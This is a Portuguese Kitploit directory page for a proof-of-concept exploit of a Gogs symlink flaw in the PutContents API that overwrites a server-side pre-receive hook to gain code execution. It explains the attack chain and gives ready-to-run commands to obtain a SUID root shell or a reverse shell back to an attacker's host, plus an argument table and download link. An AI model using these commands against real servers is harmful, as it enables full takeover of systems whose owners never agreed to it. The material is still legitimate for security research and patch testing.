Skip to content
KitploitKITPLOIT
FerramentasBlog
Log in
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
CVE-2025-81110-PoC — Manipulação inadequada de links simbólicos na API PutContents no Gogs permite execução local de código. | Kitploit
Ferramentas/GitHubGitHub/bridgeralderson/cve-2025-81110-poc
Escalada de PrivilégiosAnálise de VulnerabilidadesExploraçãoExploração de Aplicações WebTestes de PenetraçãoRed TeamingDesenvolvimento de Payloads
GitHub

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar
bridgeralderson/cve-2025-81110-poc

CVE-2025-81110-PoC

Manipulação inadequada de links simbólicos na API PutContents no Gogs permite execução local de código.

Ver Repositório
413há 5 mesesAinda não revisado

CVE-2025-81110-PoC

O tratamento inadequado de links simbólicos na API PutContents do Gogs permite a Execução Local de Código.

Este repositório contém um exploit de nível profissional para uma vulnerabilidade crítica em versões do Gogs anteriores a 0.13.0. O exploit aproveita uma falha lógica onde a API do Gogs não valida os tipos de arquivo ao atualizar o conteúdo do repositório. Ao injetar um link simbólico que aponta para um hook Git do lado do servidor (pre-receive), um usuário autenticado pode sobrescrever o conteúdo do hook com um script malicioso. Operações subsequentes de Git push disparam a execução deste script no contexto do usuário que executa o serviço Gogs (normalmente root).

Injeção de Link Simbólico: O atacante envia um link simbólico apontando para hooks internos do repositório (ex.: /root/gogs-repositories//.git/hooks/pre-receive).

Sobrescrita via API: A API do Gogs permite atualizar o conteúdo do link simbólico. Como o SO segue o link durante a operação de escrita, o hook Git interno é sobrescrito.

RCE / Escalação de Privilégio: Um Git push subsequente dispara o hook pre-receive. Se o Gogs estiver configurado com RUN_USER = root, o atacante obtém controle total do sistema.

Requisitos

  • Python 3.x
  • Biblioteca requests
  • Ferramenta de linha de comando git instalada na máquina do atacante

USO

Modo SUID

python3 exploit.py --url http://target:3000 --user <username> --pass <password> --mode suid

Após a conclusão, obtenha acesso root no alvo:

/tmp/rootbash -p

REVSHELL

python3 exploit.py --url http://target:3000 --user <username> --pass <password> --mode rev --lhost <your_ip> --lport 4444

Referência de Argumentos

ArgumentoObrigatórioDescrição
--urlSimA URL base da instância Gogs (ex.: http://127.0.0.1:3001).
--userSimNome de usuário válido para autenticação.
--passSimSenha válida para o usuário especificado.
--modeNãoModo do exploit: suid (cria /tmp/rootbash) ou rev (reverse shell).
--lhostNãoEndereço IP local para o callback do reverse shell.
--lportNãoPorta local para o listener do reverse shell.

Aviso Legal

Esta ferramenta é apenas para fins educacionais e auditoria de segurança autorizada. O autor não se responsabiliza por qualquer uso indevido ou danos causados por esta ferramenta em sistemas que você possua ou tenha permissão explícita para testar.

Baixar ferramenta